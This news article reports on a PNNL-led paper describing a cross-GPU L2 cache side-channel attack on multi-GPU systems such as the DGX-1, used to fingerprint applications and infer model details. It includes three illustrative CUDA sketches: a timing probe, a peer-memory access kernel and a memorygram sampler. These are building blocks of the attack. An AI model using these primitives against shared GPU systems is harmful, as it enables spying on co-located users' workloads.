A team of researchers led by Pacific Northwest National Laboratory (PNNL) has published a research paper describing a side-channel attack targeting architectures that rely on multiple graphics processing units (GPUs) for resource-intensive computational workloads.
Multi-GPU systems are employed in high-performance computing and cloud data centers and are shared between multiple users, meaning that the protection of applications and data flowing through them is critical.
“These systems are emerging and increasingly important computational platforms, critical to continuing to scale the performance of important applications such as deep learning. They are already offered as cloud instances offering opportunities for an attacker to spy on a co-located victim,” the researchers stated in their paper.
For their demonstrations, researchers from Pacific Northwest National Laboratory, Binghamton University, University of California, and an independent contributor used the Nvidia DGX-1 system containing two GPUs connected through a combination of custom interconnect (NVLink) and PCIe links.
The researchers reverse-engineered the cache hierarchy, demonstrating how an attack launched from one GPU can reach the L2 cache of a connected GPU and cause contention there. They also showed that an attacker could “recover the cache hit and miss behavior of another workload,” essentially allowing an application running on the remote GPU to be fingerprinted.
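Such contention is typically observed through access timing. The sketch below is a minimal, hypothetical example, not taken from the paper, of the kind of timing primitive involved: a single CUDA thread pointer-chases through a probe buffer and timestamps each dependent load with clock64(), so that fast L2 hits can be told apart from slower misses caused by a co-located workload. Buffer size, stride, and launch parameters are illustrative assumptions.

```cuda
// probe_latency.cu -- hypothetical sketch (not the paper's code) of a
// fine-grained pointer-chase timing primitive. A single thread walks a
// probe buffer through dependent loads and timestamps each access with
// clock64(); fast accesses suggest L2 hits, slow ones suggest misses or
// contention. Buffer size, stride and thresholds are illustrative assumptions.
#include <cstdio>
#include <cstdlib>
#include <cuda_runtime.h>

#define N_PROBES 256

__global__ void probe(const unsigned int *chase, long long *lat) {
    __shared__ unsigned int s_idx[N_PROBES];
    unsigned int j = 0;
    for (int k = 0; k < N_PROBES; ++k) {
        long long t0 = clock64();
        j = chase[j];            // dependent load (pointer chase)
        s_idx[k] = j;            // store forces the load to complete before t1
        long long t1 = clock64();
        lat[k] = t1 - t0;        // per-access latency in clock cycles
    }
    if (s_idx[N_PROBES - 1] == 0xffffffffu) lat[0] = -1;  // keep stores live
}

int main() {
    const size_t n = 1 << 20;                           // probe buffer entries (assumption)
    const size_t stride = 128 / sizeof(unsigned int);   // hop one 128-byte cache line

    unsigned int *h = (unsigned int *)malloc(n * sizeof(unsigned int));
    for (size_t i = 0; i < n; ++i) h[i] = (unsigned int)((i + stride) % n);  // cyclic chase

    unsigned int *d_chase; long long *d_lat; long long h_lat[N_PROBES];
    cudaMalloc(&d_chase, n * sizeof(unsigned int));
    cudaMalloc(&d_lat, sizeof(h_lat));
    cudaMemcpy(d_chase, h, n * sizeof(unsigned int), cudaMemcpyHostToDevice);

    probe<<<1, 1>>>(d_chase, d_lat);                     // one thread: latency, not bandwidth
    cudaMemcpy(h_lat, d_lat, sizeof(h_lat), cudaMemcpyDeviceToHost);

    for (int k = 0; k < 16; ++k)
        printf("probe %2d: %lld cycles\n", k, h_lat[k]); // low ~ L2 hit, high ~ miss/contention
    cudaFree(d_chase); cudaFree(d_lat); free(h);
    return 0;
}
```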
While reverse engineering the caches and exploring the shared Non-Uniform Memory Access (NUMA) configuration, the team found that “the L2 cache on each GPU caches the data for any memory pages mapped to that GPU's physical memory (even from a remote GPU).”
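The following sketch illustrates, under assumed sizes and setup rather than the paper's actual code, the memory mapping this finding refers to: a kernel on GPU 0 reads a buffer that physically resides in GPU 1's memory via peer access, and according to the finding those reads are cached in GPU 1's L2, which is what makes them observable to a process running on GPU 1.

```cuda
// peer_access.cu -- hypothetical sketch (not the paper's code) of the memory
// mapping the finding describes: a kernel on GPU 0 streams through a buffer
// whose pages are mapped to GPU 1's physical memory via peer (NVLink/PCIe)
// access. Per the finding, those reads are cached in GPU 1's L2, the "home"
// GPU, which is what makes them observable from GPU 1. Sizes are assumptions.
#include <cstdio>
#include <cuda_runtime.h>

__global__ void touch(const float *remote, size_t n, float *out) {
    float acc = 0.f;
    for (size_t i = threadIdx.x; i < n; i += blockDim.x)
        acc += remote[i];          // loads travel to GPU 1's memory, filling its L2
    atomicAdd(out, acc);           // keep every thread's loads live
}

int main() {
    int can = 0;
    cudaDeviceCanAccessPeer(&can, /*device=*/0, /*peerDevice=*/1);
    if (!can) { printf("no peer access between GPU 0 and GPU 1\n"); return 1; }

    const size_t n = 1 << 22;      // 16 MiB of floats, enough to pressure an L2 (assumption)
    float *buf_on_gpu1, *out_on_gpu0;

    cudaSetDevice(1);
    cudaMalloc(&buf_on_gpu1, n * sizeof(float));   // pages mapped to GPU 1's physical memory
    cudaMemset(buf_on_gpu1, 0, n * sizeof(float));

    cudaSetDevice(0);
    cudaDeviceEnablePeerAccess(1, 0);              // allow GPU 0 to dereference GPU 1 pointers
    cudaMalloc(&out_on_gpu0, sizeof(float));
    cudaMemset(out_on_gpu0, 0, sizeof(float));

    touch<<<1, 256>>>(buf_on_gpu1, n, out_on_gpu0);  // remote reads, cached on the home GPU
    cudaDeviceSynchronize();

    printf("GPU 0 streamed through GPU 1-resident memory\n");
    cudaFree(out_on_gpu0);
    cudaSetDevice(1);
    cudaFree(buf_on_gpu1);
    return 0;
}
```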
Additionally, the researchers demonstrated proof-of-concept side-channel attacks in which they recovered the memorygram of a remote victim's accesses and used it to fingerprint applications on the victim GPU and to infer the number of neurons in a hidden layer of a machine learning model.
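A memorygram can be thought of as a time series of aggregate probe latencies. The hypothetical sketch below, which is not the researchers' code and uses illustrative sizes and intervals, records one aggregate latency value per sampling interval; spikes in the resulting trace correspond to intervals in which the victim displaced the attacker's data from the shared L2.

```cuda
// memorygram.cu -- hypothetical sketch (not the researchers' code) of building
// a "memorygram": the attacker repeatedly sweeps a probe set and logs one
// aggregate access latency per sampling interval. Spikes in the resulting time
// series mark intervals in which another workload displaced the attacker's data
// from the shared L2, so the trace acts as a signature of the victim's activity.
#include <cstdio>
#include <cstdlib>
#include <cuda_runtime.h>

__global__ void probe_sum(const unsigned int *chase, int n_hops, long long *total) {
    unsigned int j = 0;
    long long t0 = clock64();
    for (int k = 0; k < n_hops; ++k)
        j = chase[j];                    // dependent loads sweep the probe set
    long long t1 = clock64();
    *total = (t1 - t0) + (j & 0);        // aggregate latency; (j & 0) keeps the chase live
}

int main() {
    const size_t n = 1 << 20;            // probe buffer entries (assumption)
    const size_t stride = 32;            // one 128-byte line per hop
    const int samples = 1000;            // memorygram length (assumption)

    unsigned int *h = (unsigned int *)malloc(n * sizeof(unsigned int));
    for (size_t i = 0; i < n; ++i) h[i] = (unsigned int)((i + stride) % n);

    unsigned int *d_chase; long long *d_total;
    cudaMalloc(&d_chase, n * sizeof(unsigned int));
    cudaMalloc(&d_total, sizeof(long long));
    cudaMemcpy(d_chase, h, n * sizeof(unsigned int), cudaMemcpyHostToDevice);

    long long *memorygram = (long long *)malloc(samples * sizeof(long long));
    for (int s = 0; s < samples; ++s) {
        probe_sum<<<1, 1>>>(d_chase, 4096, d_total);
        cudaMemcpy(&memorygram[s], d_total, sizeof(long long), cudaMemcpyDeviceToHost);
    }

    for (int s = 0; s < 10; ++s)
        printf("interval %d: %lld cycles\n", s, memorygram[s]);
    cudaFree(d_chase); cudaFree(d_total); free(h); free(memorygram);
    return 0;
}
```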
The researchers also designed a deep learning network to accurately identify applications based on their memorygrams, and say this can serve as a basis for future attacks that not only identify a target application but also infer information about it.
“This attack can be used to identify and reverse engineer the scheduling of applications on a multi-GPU system (simply by spying on all other GPUs in a GPU-box), identify target GPUs that are running a specific victim application, and even identify the kernels running on each GPU,” the researchers added.
While GPUs do have some defenses designed to thwart side-channel attacks on a single GPU, they are not designed to mitigate this new type of attack, which is conducted from user level and does not require the system-level capabilities that other attacks rely on.